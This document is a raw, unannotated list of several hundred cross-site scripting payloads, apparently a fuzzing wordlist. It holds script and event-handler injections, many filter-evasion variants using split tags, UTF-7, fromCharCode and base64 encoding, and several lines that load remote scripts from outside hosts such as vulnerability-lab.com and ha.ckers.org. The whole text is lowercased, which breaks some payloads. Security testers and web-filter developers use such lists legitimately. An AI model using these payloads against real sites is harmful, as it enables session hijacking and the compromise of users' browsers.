confirm(2)>/
<svg><script>alert(/1/)</script>
</script><script>alert(1)</script>
5rt(0);'>rhainfosec
>"<img src=&{document.cookie=true;};>
>"<img src="mocha:document.cookie=true;">
>"<img src="livescript:document.cookie=true;">
prompt(1);>
<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("crosssitescripting")>
<table background="javascript:alert('crosssitescripting')">
<table><td background="javascript:alert('crosssitescripting')">
<br size="&{alert('crosssitescripting')}">
<a href="http://server.com/">crosssitescripting</a>
<a href="http://1113982867/">crosssitescripting</a>
<a href="javascript:document.location='http://www.vulnerability-lab.com/'">crosssitescripting</a>
";alert('crosssitescripting');//
<input type="image" src="javascript:alert('crosssitescripting');">
scriptalert(crosssitescripting)/script
<img style="crosssitescripting:expr/*crosssitescripting*/ession(alert('crosssitescripting'))">
<html xmlns:crosssitescripting><?import namespace="crosssitescripting" implementation="http://ha.ckers.org/crosssitescripting.htc"><crosssitescripting:crosssitescripting>crosssitescripting</crosssitescripting:crosssitescripting>
<xml id=i><x><c><![cdata[<img src="javas]]><![cdata[cript:alert('crosssitescripting');">]]>
<xml id="crosssitescripting"><i><b><img src="javas<!-- -->cript:alert('crosssitescripting')"></b></i></xml>
<span datasrc="#crosssitescripting" datafld="b" dataformatas="html"></span>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
</body></html>
<script src="http://vulnerability-lab.com/crosssitescripting.jpg"></script>
<img src="http://www.vulnerability-lab.com/file.php?variables=malicious">
<iframe src=http://test.de>
><img id=xss src=x onerror=alert(xss);>
;!--"<xss>=&{()}"
<img id=xss src=javascript:alert('xss')>
<img id=xss src=javascript:alert("xss")>
<img id=xss src="jav ascript:alert('xss');">
<img id=xss src=javascript:alert("xss")>";' >
<<script>alert("xss");//<</script>
";alert('xss');//
<script>alert(/xss/.source)</script>
<body background="javascript:alert('xss')">
<input type="image" id=xss src="javascript:alert('xss');">
<script>alert('xssya')</script>
1<script>prompt(999691)</script>
//1<script>prompt(919397)</script>
'"</script><script>alert('xssya')</script>
1<script >prompt(962477)</script>
"><script>alert('xssya')</script>
'';!--"<xss>=&{()}
";alert(1)//
<script>alert('xssya');</script>
<scr<script>ipt>alert(1)</scr<script>ipt>
javascript:alert(1)//
"x:alert" onerror="eval(src+'(0)')">
data:text/html,<script>alert(0)</script>
<img+src=x+onerror=prompt(1);>
<video+src=x+onerror=prompt(1);>
";alert('xss)//
<img """><script>alert("xss")</script>">
<iframe/src="data:text/html; base64 ,pgjvzhkgb25sb2fkpwfszxj0kdeppg==">
"javascript:alert(1)"><input type=submit>
<isindex action=j a vas c r ipt:alert(1) type=image>
confirm(2)>
"test"></form><button form="test" formaction="javascript:alert(1)">x</button>
write(1) autofocus>
javascript:alert(1)//></video>
alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
"alert(1)">
"alert(1)"><source></source></video>
alert(1)><input autofocus>
"javascript:alert(1)">clickme</math>
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
"x"><img onerror="alert(1)"></picture>
",,,,,x" onerror="alert(1)">
"javascript:alert(1)"></table>
"</comment><img src=x onerror=alert(1)//">
"</style><img src=x onerror=alert(1)//">
content:url(data:image/svg+xml,<svg/>);visibility:hidden onload=alert(1)></div>
"javascript://"/></head><body><a href="/. /,alert(1)//
"data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg=="></embed>
<b <script>alert(1)//</script>0</script></b>
document.getelementbyid("div1").innerhtml;</script>
width:1px;filter:glow onfilterchange=alert(1)>x</div>
"x` `<script>alert(1)</script>"` `>
alt=alert(1)//">
xx:xx onerror=alert(1)//--!>
"-o-link:'javascript:alert(1)';-o-link-source:current">x</a>
x:expression8write(1)9>
$,_=1}}).$=alert</script>
function,[{}][0].constructor._('alert(1)')()</script>
"#">{alert(1)}</script>;1
<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<meta http-equiv="set-cookie" content="userid=<script>document.cookie=true</script>">
<img src="jav ascript:document.cookie=true;">
<img src="javascript:document.cookie=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.cookie=true;>
<script>document.cookie=true;//<</script>
<iframe src="javascript:document.cookie=true;>
<script>a=/crosssitescripting/ document.cookie=true;</script>
<input type="image" src="javascript:document.cookie=true;">
<body background="javascript:document.cookie=true;">
<img dynsrc="javascript:document.cookie=true;">
<img lowsrc="javascript:document.cookie=true;">
<br size="&{document.cookie=true}">
<layer src="javascript:document.cookie=true;"></layer>
<style>li {list-style-image: url("javascript:document.cookie=true;");</style><ul><li>crosssitescripting
scriptdocument.cookie=true;/script
<frameset><frame src="javascript:document.cookie=true;"></frameset>
<table background="javascript:document.cookie=true;">
<div style="background-image: url(javascript:document.cookie=true;)">
<div style="width: expression(document.cookie=true);">
<img style="crosssitescripting:expr/*crosssitescripting*/ession(document.cookie=true)">
<crosssitescripting style="crosssitescripting:expression(document.cookie=true)">
<style type="text/javascript">document.cookie=true;</style>
<body onload=alert('xss')>
<style type="text/css">body{background:url("javascript:document.cookie=true")}</style>
<base href="javascript:document.cookie=true;//">
<xml id=i><x><c><![cdata[<img src="javas]]<![cdata[cript:document.cookie=true;">]]</c></x></xml><span datasrc=#i datafld=c dataformatas=html></span>
<xml id="crosssitescripting"><i><b><img src="javas<!-- -->cript:document.cookie=true"></b></i></xml><span datasrc="#crosssitescripting" datafld="b" dataformatas="html"></span>
<? echo('<scr)';echo('ipt>document.cookie=true</script>'); ?>
<head><meta http-equiv="content-type" content="text/html; charset=utf-7"> </head>+adw-script+ad4-document.cookie=true;+adw-/script+ad4-
<div onmouseover="document.cookie=true;">
<input type="image" dynsrc="javascript:document.cookie=true;">
&{document.cookie=true;};
<img src=&{document.cookie=true;};>
<img src="livescript:document.cookie=true;">
<a href="about:<script>document.cookie=true;</script>">
<div style="background-image: url(javascript:document.cookie=true;);">
<div style="behaviour: url([link to code]);">
<div style="width: expression(document.cookie=true;);">
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<xml id="x"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#x"></div> ]]> [a][a]script>document.cookie=true;[a][a]/script>
>"<meta http-equiv="set-cookie" content="userid=<script>document.cookie=true</script>">
>"<script>document.cookie=true;</script>
>"<img src="javascript:document.cookie=true;">
>"<img src=" javascript:document.cookie=true;">
>"<script>document.cookie=true;//<</script>
>"<script <b>document.cookie=true;</script>
>"<script>a=/crosssitescripting/ document.cookie=true;</script>
>"</title><script>document.cookie=true;</script>
>"<body background="javascript:document.cookie=true;">
>"<body onload=document.cookie=true;>
>"<img lowsrc="javascript:document.cookie=true;">
>"<bgsound src="javascript:document.cookie=true;">
>"<layer src="javascript:document.cookie=true;"></layer>
>"<link rel="stylesheet" href="javascript:document.cookie=true;">
>"scriptdocument.cookie=true;/script
>"<iframe src="javascript:document.cookie=true;"></iframe>
>"<table background="javascript:document.cookie=true;">
>"<table><td background="javascript:document.cookie=true;">
>"<div style="width: expression(document.cookie=true);">
>"<style>@im\\port'\\ja asc ipt:document.cookie=true';</style>
>"<crosssitescripting style="crosssitescripting:expression(document.cookie=true)">
>"exp/*<a style='no\\crosssitescripting:nocrosssitescripting("*//*");crosssitescripting:ex/*crosssitescripting*//*/*/pression(document.cookie=true)'>
>"<style>.crosssitescripting{background-image:url("javascript:document.cookie=true");}</style><a class=crosssitescripting></a>
>"<style type="text/css">body{background:url("javascript:document.cookie=true")}</style>
>"<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></object>
>"<xml id=i><x><c><![cdata[<img src="javas]]<![cdata[cript:document.cookie=true;">]]</c></x></xml><span datasrc=#i datafld=c dataformatas=html></span>
>"<html><body><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributename="innerhtml" to="crosssitescripting<script defer>document.cookie=true</script>"></body></html>
>"<? echo('<scr)';echo('ipt>document.cookie=true</script>'); ?>
>"<a href="javascript#document.cookie=true;">
>"<div onmouseover="document.cookie=true;">
>"&<script>document.cookie=true;</script>
>"&{document.cookie=true;};
>"<body onload="document.cookie=true;">
>"<div style="background-image: url(javascript:document.cookie=true;);">
>"<div style="binding: url([link to code]);">
>"<div style="width: expression(document.cookie=true;);">
>"<style><!--</style><script>document.cookie=true;//--></script>
>"<<script>document.cookie=true;</script>
>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.cookie=true;">
>"<xml src="javascript:document.cookie=true;">
>"<xml id="x"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<meta http-equiv="set-cookie" content="userid=<script>document.cookie=true</script>">
-1<img src="jav ascript:document.cookie=true;">
-1<img src="javascript:document.cookie=true;">
-1<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.cookie=true;>
-1<script>document.cookie=true;//<</script>
-1<iframe src="javascript:document.cookie=true;>
-1<script>a=/crosssitescripting/ document.cookie=true;</script>
-1<input type="image" src="javascript:document.cookie=true;">
-1<body background="javascript:document.cookie=true;">
-1<img dynsrc="javascript:document.cookie=true;">
-1<img lowsrc="javascript:document.cookie=true;">
-1<br size="&{document.cookie=true}">
-1<layer src="javascript:document.cookie=true;"></layer>
-1<style>li {list-style-image: url("javascript:document.cookie=true;");</style><ul><li>crosssitescripting
-1scriptdocument.cookie=true;/script
-1<frameset><frame src="javascript:document.cookie=true;"></frameset>
-1<table background="javascript:document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;)">
-1<div style="width: expression(document.cookie=true);">
-1<img style="crosssitescripting:expr/*crosssitescripting*/ession(document.cookie=true)">
-1<crosssitescripting style="crosssitescripting:expression(document.cookie=true)">
-1<style type="text/javascript">document.cookie=true;</style>
-1<style>.crosssitescripting{background-image:url("javascript:document.cookie=true");}</style><a class=crosssitescripting></a>
-1<base href="javascript:document.cookie=true;//">
"><iframe src=a onload=alert("vl") <
-1<xml id=i><x><c><![cdata[<img src="javas]]<![cdata[cript:document.cookie=true;">]]</c></x></xml><span datasrc=#i datafld=c dataformatas=html></span>
-1<xml id="crosssitescripting"><i><b><img src="javas<!-- -->cript:document.cookie=true"></b></i></xml><span datasrc="#crosssitescripting" datafld="b" dataformatas="html"></span>
-1<? echo('<scr)';echo('ipt>document.cookie=true</script>'); ?>
-1<head><meta http-equiv="content-type" content="text/html; charset=utf-7"> </head>+adw-script+ad4-document.cookie=true;+adw-/script+ad4-
-1<div onmouseover="document.cookie=true;">
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1&{document.cookie=true;};
-1<img src=&{document.cookie=true;};>
-1<img src="livescript:document.cookie=true;">
<img dyn id=xss src="javascript:alert('xss')">
-1<body onload="document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;);">
-1<div style="binding: url([link to code]);">
-1<div style="width: expression(document.cookie=true;);">
-1<style><!--</style><script>document.cookie=true;//--></script>
-1<<script>document.cookie=true;</script>
-1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
-1<img src="blah"onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="x"><a><b><script>document.cookie=true;</script>;</b></a></xml>
>"<iframe src=http://vulnerability-lab.com/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
><script>alert("vlab")</script>
>"<iframe src=http://vulnerability-lab.com></iframe>
<button.onclick="alert(string.fromcharcode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,110,103,64,82,69,77,7,86,69,34,41,60,47,115,99,114,105,112,116,62));">string:from.char.code</button></body></html>
';alert(string.fromcharcode(88,83,83))//';alert(string.fromcharcode(88,83,83))//";alert(string.fromcharcode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//";alert(string.fromcharcode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></script>">'><script>alert(string.fromcharcode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</script>
<script>alert("crosssitescripting2")</script>
<script>alert(document.cookie)</script>
<script>alert('vl')</script>
<!--#exec cmd="/bin/echo '<scr'"--><!--#exec cmd="/bin/echo 'ipt src=http://vulnerability-lab.com/crosssitescripting.js></script>'"-->
<img src=javascript:alert("crosssitescripting")>";' >
<script>alert("crosssitescripting")</script>";' >
<embed src="http://vulnerability-lab.com/crosssitescripting.swf" allowscriptaccess="always"></embed>
<embed src="data:image/svg+xml;base64,phn2zyb4bwxuczpzdmc9imh0dh a6ly93d3cudzmub3jnlziwmdavc3zniib4bwxucz0iahr0cdovl3d3dy53my5vcmcv mjawmc9zdmciihhtbg5zonhsaw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hs aw5riib2zxjzaw9upsixljaiihg9ijaiihk9ijaiihdpzhropsixotqiighlawdodd0imjaw iibpzd0iehnzij48c2nyaxb0ihr5cgu9inrlehqvzwntyxnjcmlwdci+ywxlcnqoilh tuyipozwvc2nyaxb0pjwvc3znpg==" type="image/svg+xml" allowscriptaccess="always"></embed>
<script src=http://vulnerability-lab.com/crosssitescripting.js></script>
<<script>alert("crosssitescripting");//<</script>
<script src=//vulnerability-lab.com/.js>
<script>a=/crosssitescripting/ alert(a.source)</script>
<script a=`>` src="http://vulnerability-lab.com/crosssitescripting.js"></script>
<script>document.write("<scri");</script>pt src="http://vulnerability-lab.com/crosssitescripting.js"></script>
<img src="javascript:alert('crosssitescripting');">
<img src=javascript:alert('crosssitescripting')>
<img src=`javascript:alert("rm'crosssitescripting'")`>
<img """><script>alert("crosssitescripting")</script>">
<img src="jav ascript:alert('crosssitescripting');">
<img src=" javascript:alert('crosssitescripting');">
<img dynsrc="javascript:alert('crosssitescripting')">
<img lowsrc="javascript:alert('crosssitescripting')">
<img src="mocha:[code]">
<img src="livescript:[code]">
<meta http-equiv="refresh" content="0;url=data:text/html;base64,phnjcmlwdd5hbgvydcgnwfntjyk8l3njcmlwdd4k">
<meta http-equiv="refresh" content="0; url=http://;url=javascript:alert('crosssitescripting');">
<meta http-equiv="set-cookie" content="userid=<script>alert('crosssitescripting')</script>">
<head><meta http-equiv="content-type" content="text/html; charset=utf-7"> </head>+adw-script+ad4-alert('crosssitescripting');+adw-/script+ad4-
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('crosssitescripting')></object>
<style>@im\\port'\\ja asc ipt:alert("crosssitescripting")';</style>
<style type="text/javascript">alert('crosssitescripting');</style>
<style>.crosssitescripting{background-image:url("javascript:alert('crosssitescripting')");}</style><a class=crosssitescripting></a>
<style>li {list-style-image: url("javascript:alert('crosssitescripting')");}</style><ul><li>crosssitescripting
<style>body{-moz-binding:url("http://vulnerability-lab.com/crosssitescriptingmoz.xml#crosssitescripting")}</style>
<div style="background-image:52c8'a161332904a1c5248.10278.1053379'9">
<div style="width: expression(alert('crosssitescripting'));">
<link rel="stylesheet" href="javascript:alert('crosssitescripting');">
<link rel="stylesheet" href="http://vulnerability-lab.com/crosssitescripting.css">
<body onload=alert('crosssitescripting')>
<img low id=xss src="javascript:alert('xss')">
<link rel="stylesheet" href="javascript:alert('xss');">
<img id=xss src='vbscript:msgbox("xss")'>
<table id=xss background="javascript:alert('xss')">
<table id=xss><td background="javascript:alert('xss')">
<div id=xss style="width: expression(alert('xss'));">
<iframe id=xss src="javascript:alert('xss');"></iframe>
<table background="javascript:alert('xss')">
<table><td background="javascript:alert('xss')">"
<img id=xss style="xss:expr/*xss*/ession(alert('xss'))">
<style type="text/javascript">alert('xss');</style>
<style type="text/css">body{background:url("javascript:alert('xss')")}</style>
<base href="javascript:alert('xss');//">
a="get";b="url("";c="javascript:";d="alert('xss');")";eval(a+b+c+d);
<xml id=xss><x><c><![cdata[<img id=xss src="javas]]><![cdata[cript:alert('xss');">]]></c></x><xml><span dataid=xss src=#i datafld=cdataformatas=html></span>
<xml id=xss src="xsstest.xml" id=i></xml><span dataid=xss src=#i datafld=c dataformatas=html></span>
<html><body><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributename="innerhtml" to="xss<script defer>alert("xss")</script>"></body></html>
<meta http-equiv="set-cookie" content="userid=<script>alert('xss')</script>">
<script id=xss src=http://127.0.0.1></script>
<img id=xss src=javascript:alert(string.fromcharcode(88,83,83))>
<img id=xss src="&14;javascript:alert('xss');">
<iframe id=xss src="javascript:alert('xss'); <
<script>a=/xss/nalert('xss');</script>
<div style="background-image: url(javascript:alert('xss'));">
<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>+adw-script+ad4-alert('xss');+adw-/script+ad4-
<div onmouseover="alert('xss');">,
<input type="image" dynid=xss src="javascript:alert('xss');">
<img id=xss src=&{alert('xss');};>
<a id=xss href="about:<script>alert('xss');</script>">
<object classid=clsid:..." codebase="javascript:alert('xss');">
<style><!--</style><script>alert('xss');//--></script>
<!-- -- --><script>alert('xss');</script><!-- -- -->
<img id=xss src="blah"onmouseover="alert('xss');">
<xml id="x"><a><b><script>alert('xss');</script>;<b></a></xml>
<div datafld="b" dataformatas="html" dataid=xss src="#xss"></div>
<xml id=i><x><c><![cdata[<img id=xss src="javas]]<![cdata[cript:alert('xss');">]]</c><x></xml>
<form id="test" /><button form="test" formaction="javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">x
<select id=xss onfocus=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
<textarea id=xss onfocus=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
<input id=xss onblur=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
<video id=xss poster=javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//
<video><source onerror="javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">
<video onerror="javascript:eval(string['fromcharcode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>
<iframe id=xss / "onload=alert(/xss/)></iframe>
<iframe id=xss///////onload=alert(/xss/)></iframe>
<iframe id=xss <?php echo chr(11)?> onload=alert(/xss/)></iframe>
<iframe id=xss <?php echo chr(12)?> onload=alert(/xss/)></iframe>
" onblur=alert(xss) "> <"
" onmouseover=alert(xss) ">
<style>li {list-style-image: url("javascript:alert('xss')");}</style><ul><li>xss
</textarea>'"><script>alert(xss)</script>
</script></script><<<<script><>>>><<<script>alert(xss)</script>
<html><noalert><noscript>(xss)</noscript><script>(xss)</script>
}</style><script>a=eval;b=alert;a(b(/xss/.source));</script>
<script>document.write("xss");</script>
='><script>alert("xss")</script>
<body background=javascript:'"><script>alert(xss)</script>></body>
<script>alert('xss');</script>
<script id=xss src=http://ha.ckers.org/xss.js></script>
id=xss src= <img 6;avascript:alert('xss')>
<script/xss id=xss src="http://ha.ckers.org/xss.js"></script>
<img id=xss src="javascript:alert('xss')"
<script>a=/xss/
<img lowid=xss src="javascript:alert('xss')">
<br size="&{alert('xss')}">
<link rel="stylesheet" href="http://ha.ckers.org/xss.css">
<style>@import'http://ha.ckers.org/xss.css';</style>
<style>body{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</style>
<img id=xss src="mocha:[code]">
<meta http-equiv="link" content="<javascript:alert('xss')>; rel=stylesheet">
<meta http-equiv="refresh" content="0; url=http://;url=javascript:alert('xss');">
<div style="width: expression(alert('xss'));">
<img style="xss:expr/*xss*/ession(alert('xss'))">
exp/*<xss style='no\\xss:noxss("*//*");
<object type="text/x-scriptlet" data="http://ha.ckers.org/scriptlet.html"></object>
a="get";
<!--<value><![cdata[<xml id=i><x><c><![cdata[<img id=xss src="javas<![cdata[cript:alert('xss');">
<script id=xss src="http://ha.ckers.org/xss.jpg"></script>
<!--#exec cmd="/bin/echo '<script src'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></script>'"-->
<head><meta http-equiv="content-type" content="text/html; charset=utf-7"> </head>+adw-script+ad4-alert('xss');+adw-/script+ad4-
<script a=">" id=xss src="http://ha.ckers.org/xss.js"></script>
<script "a='>'" id=xss src="http://ha.ckers.org/xss.js"></script>
<script a=`>` id=xss src="http://ha.ckers.org/xss.js"></script>
